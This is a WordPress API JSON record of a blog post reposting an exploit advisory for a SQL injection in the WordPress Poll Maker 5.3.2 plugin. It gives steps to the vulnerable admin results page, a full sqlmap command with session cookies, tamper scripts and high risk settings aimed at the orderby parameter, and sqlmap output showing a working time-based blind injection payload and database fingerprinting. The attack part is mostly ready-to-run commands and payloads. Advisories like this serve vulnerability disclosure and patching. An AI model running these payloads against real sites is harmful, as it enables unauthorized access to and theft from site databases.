{"id":58138,"date":"2024-07-11T18:10:14","date_gmt":"2024-07-11T15:10:14","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179500\/wppollmaker532-sql.txt"},"modified":"2024-07-11T18:10:14","modified_gmt":"2024-07-11T15:10:14","slug":"wordpress-poll-maker-5-3-2-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-poll-maker-5-3-2-sql-injection\/","title":{"rendered":"WordPress Poll Maker 5.3.2 SQL Injection"},"content":{"rendered":"<p># Exploit Title: WordPress Poll Maker Plugin SQL Injection <br \/># Date: 2024-07-11<br \/># Exploit Author: tmrswrr<br \/># Category : Webapps<br \/># Vendor: https:\/\/ays-pro.com\/wordpress\/poll-maker<br \/># Version 5.3.2<\/p>\n<p>1. **Access the Admin Panel:**<br \/>- Navigate to the admin panel of your WordPress site.<br \/>- Go to `Poll Maker` &gt; `Results` &gt; https:\/\/localhost\/wordpress\/wp-admin\/admin.php?page=poll-maker-ays-results&amp;orderby=id&amp;order=desc<br \/>3. 
Search for orderby parameter.<\/p>\n<p>## SQLMAP COMMAND<\/p>\n<p>python3 sqlmap.py -u \"https:\/\/localhost\/wordpress\/wp-admin\/admin.php?page=poll-maker-ays-results&amp;orderby=id&amp;order=desc\" --cookie=\"wordpress_logged_in_55e28812cb0bc43705127d62a25df794=admin|1720624086|cQgkhpgoy0ZxhQSupSHRw7bo9mxcwEWyUp0VreNnZBK|d74e12a1cdecafc50c920c18d4711826598780dd360f3a637abcc68a6086f7a3; _wp_travel_engine_session=010869411d3c5e302ccf674d9a49d453||1720689253||1720688893; wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|81237d448295de9d99b8560e6b6d9d8640f81c4dbb629e550e56860775baf0b3; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|d8d2e1da10a83ab054e39b8dfa5787c0dc2d586f364bcb584983b26efb857285; wordpress_test_cookie=WP Cookie check; wp-settings-1=editor=html; wp-settings-time-1=1720687513\" --batch --dbms=mysql --threads=10 --no-cast --random-agent -v 3 --tamper=\"between,randomcase,space2comment\" --level=5 --risk=3 <\/p>\n<p>## RESULT<\/p>\n<p>Parameter: orderby (GET)<br \/>Type: time-based blind<br \/>Title: MySQL &gt;= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)<br \/>Payload: page=poll-maker-ays-results&amp;orderby=id PROCEDURE ANALYSE(EXTRACTVALUE(3054,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x58655778))))),1)# wcUc&amp;order=desc<br \/>Vector: PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)<br \/>---<\/p>\n<p>---<br \/>[08:03:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s)<br \/>[08:03:59] [INFO] the back-end DBMS is MySQL<br \/>[08:03:59] [PAYLOAD] 
id\/**\/PrOCEdUrE\/**\/analySE(exTRActvALuE(6707,CoNcAT(0x5c,(iF((VeRSION()\/**\/LikE\/**\/0x254d61726961444225),BenChmaRk(5000000,MD5(0x6e454541)),6707)))),1)#\/**\/ZrRh<br \/>[08:03:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions <br \/>do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y\/n] Y<br \/>[08:04:01] [DEBUG] used the default behavior, running in batch mode<br \/>web application technology: Apache 2.4.54, PHP 8.0.23<br \/>back-end DBMS: MySQL &gt;= 5.0.12 (MariaDB fork)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WordPress Poll Maker Plugin SQL Injection # Date: 2024-07-11# Exploit Author: tmrswrr# Category : Webapps# Vendor: https:\/\/ays-pro.com\/wordpress\/poll-maker# Version 5.3.2 1. **Access the Admin Panel:** - Navigate to the admin panel of your WordPress site. - Go to `Poll Maker` &gt; `Results` &gt; https:\/\/localhost\/wordpress\/wp-admin\/admin.php?page=poll-maker-ays-results&amp;orderby=id&amp;order=desc 3. Search for orderby parameter. 
## SQLMAP COMMAND python3 sqlmap.py -u \"https:\/\/localhost\/wordpress\/wp-admin\/admin.php?page=poll-maker-ays-results&amp;orderby=id&amp;order=desc\" &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58138","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58138","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58138"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58138\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58138"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58138"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58138"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}